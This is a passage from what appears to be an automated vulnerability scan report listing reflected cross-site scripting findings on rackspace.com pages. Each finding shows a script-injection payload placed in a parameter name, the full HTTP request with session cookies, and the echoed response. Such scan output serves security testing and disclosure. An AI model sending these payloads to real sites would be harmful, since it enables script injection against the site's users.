<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/index.php?noflash=true93307"><script>alert(1)</script>52822b1d737&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a425300ec182657b7e0','custclient','width=500,height=320');return false ...[SNIP]...
4.138. http://www.rackspace.com/information/aboutus.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/aboutus.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e706a"><script>alert(1)</script>ea74ab7f6b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/aboutus.php?e706a"><script>alert(1)</script>ea74ab7f6b0=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... p" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/aboutus.php?e706a"><script>alert(1)</script>ea74ab7f6b0=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.139. http://www.rackspace.com/information/contactus.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/contactus.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3623a"><script>alert(1)</script>6457e4ed9ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/contactus.php?3623a"><script>alert(1)</script>6457e4ed9ad=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
4.140. http://www.rackspace.com/information/events/briefingprogram.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/events/briefingprogram.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31c1"><script>alert(1)</script>3adc45aa57e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/events/briefingprogram.php?c31c1"><script>alert(1)</script>3adc45aa57e=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... "track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/briefingprogram.php?c31c1"><script>alert(1)</script>3adc45aa57e=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a4242353bda923acdd2','custclient','width=500,height=320');return fal ...[SNIP]...
4.141. http://www.rackspace.com/information/events/green.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/events/green.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a03c6"><script>alert(1)</script>892efc84f3b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /information/events/green.php?a03c6"><script>alert(1)</script>892efc84f3b=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/green/index.php?a03c6"><script>alert(1)</script>892efc84f3b=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.142. http://www.rackspace.com/information/events/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/events/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ad42"><script>alert(1)</script>e58f97036b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/events/index.php?7ad42"><script>alert(1)</script>e58f97036b2=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/index.php?7ad42"><script>alert(1)</script>e58f97036b2=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.143. http://www.rackspace.com/information/events/rackgivesback.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/events/rackgivesback.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3d2a"><script>alert(1)</script>38b6eea6844 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/events/rackgivesback.php?c3d2a"><script>alert(1)</script>38b6eea6844=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... k="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/events/rackgivesback.php?c3d2a"><script>alert(1)</script>38b6eea6844=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.144. http://www.rackspace.com/information/hosting101/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/hosting101/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 866e4"><script>alert(1)</script>04bceca55eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/hosting101/index.php?866e4"><script>alert(1)</script>04bceca55eb=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... click="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/hosting101/index.php?866e4"><script>alert(1)</script>04bceca55eb=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.145. http://www.rackspace.com/information/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b7c8"><script>alert(1)</script>a5a645fcc81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/index.php?8b7c8"><script>alert(1)</script>a5a645fcc81=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... rap" onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/index.php?8b7c8"><script>alert(1)</script>a5a645fcc81=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=2f0f5a42e06467fc5ccee756','custclient','width=500,height=320');return false;"> ...[SNIP]...
4.146. http://www.rackspace.com/information/legal/clouddriveterms.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/legal/clouddriveterms.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6903a"><script>alert(1)</script>2d1194f3a9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/legal/clouddriveterms.php?6903a"><script>alert(1)</script>2d1194f3a9e=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/legal/clouddriveterms.php?6903a"><script>alert(1)</script>2d1194f3a9e=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=5a9e0%2522a%253d%2522b%25224adc5fe066e','custclient','width=500,height=32 ...[SNIP]...
4.147. http://www.rackspace.com/information/legal/generalterms.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/legal/generalterms.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8ea9"><script>alert(1)</script>7d1376fa0d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /information/legal/generalterms.php?c8ea9"><script>alert(1)</script>7d1376fa0d0=1 HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol ...[SNIP]... ick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspace.com/information/legal/generalterms.php?c8ea9"><script>alert(1)</script>7d1376fa0d0=1&optionaldata3=cleanEntry&optionaldata4=US4da9da571af9d6d58e6c524219e4d7f8&optionaldata5=http://www.google.com/search?hl=en&q=2f0f5a42a9db35b45dd84769','custclient','width=500,height=320');return fal ...[SNIP]...
4.148. http://www.rackspace.com/information/legal/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rackspace.com
Path:
/information/legal/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3a89"><script>alert(1)</script>0d45bdf3fa5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
